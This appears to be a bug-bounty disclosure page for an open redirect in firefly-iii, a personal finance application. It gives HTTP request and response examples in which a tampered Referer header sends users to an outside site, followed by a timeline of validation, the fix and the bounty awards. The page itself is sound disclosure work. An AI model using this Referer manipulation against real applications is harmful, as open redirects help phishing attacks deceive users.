Open Redirect in firefly-iii/firefly-iii

Valid

Reported on

Oct 1st 2021


Steps:

  1. Login in application and and navigate to bill section and create bill and capture the request.

Web applications use different techniques to redirect users to the next page. Apps may use URL query parameters, header values, with JavaScript code, or it may be backend code. In case of this application, the value of the “Referer” header was used to redirect to next page.

Original Request:

POST /bills/store HTTP/1.1

Host: demo.firefly-iii.org

.

.

.

Original Response:

HTTP/1.1 302 Found

location: https://demo.firefly-iii.org/bills/create

.

.

.

Modified Request:

POST /bills/store HTTP/1.1

Host: demo.firefly-iii.org

Referer: http://abc.com/

.

.

.

Modified Response:

HTTP/1.1 302 Found

location: http://abc.com/

<!DOCTYPE html>

<html>

<head>

<meta charset="UTF-8" />

<meta http-equiv="refresh" content="0;url='http://abc.com/'" />

<title>Redirecting to http://abc.com/</title>

</head>

<body>

Redirecting to <a href="http://abc.com/">http://abc.com/</a>.

</body>

</html>

We have contacted a member of the firefly-iii team and are waiting to hear back 2 years ago
James Cole validated this vulnerability 2 years ago
takester has been awarded the disclosure bounty
The fix bounty is now up for grabs
James Cole marked this as fixed with commit 8662df 2 years ago
James Cole has been awarded the fix bounty
This vulnerability will not receive a CVE
Jamie Slome
2 years ago

Admin


CVE published! 🎊

takester
2 years ago

Researcher


Thanks🎊

to join this conversation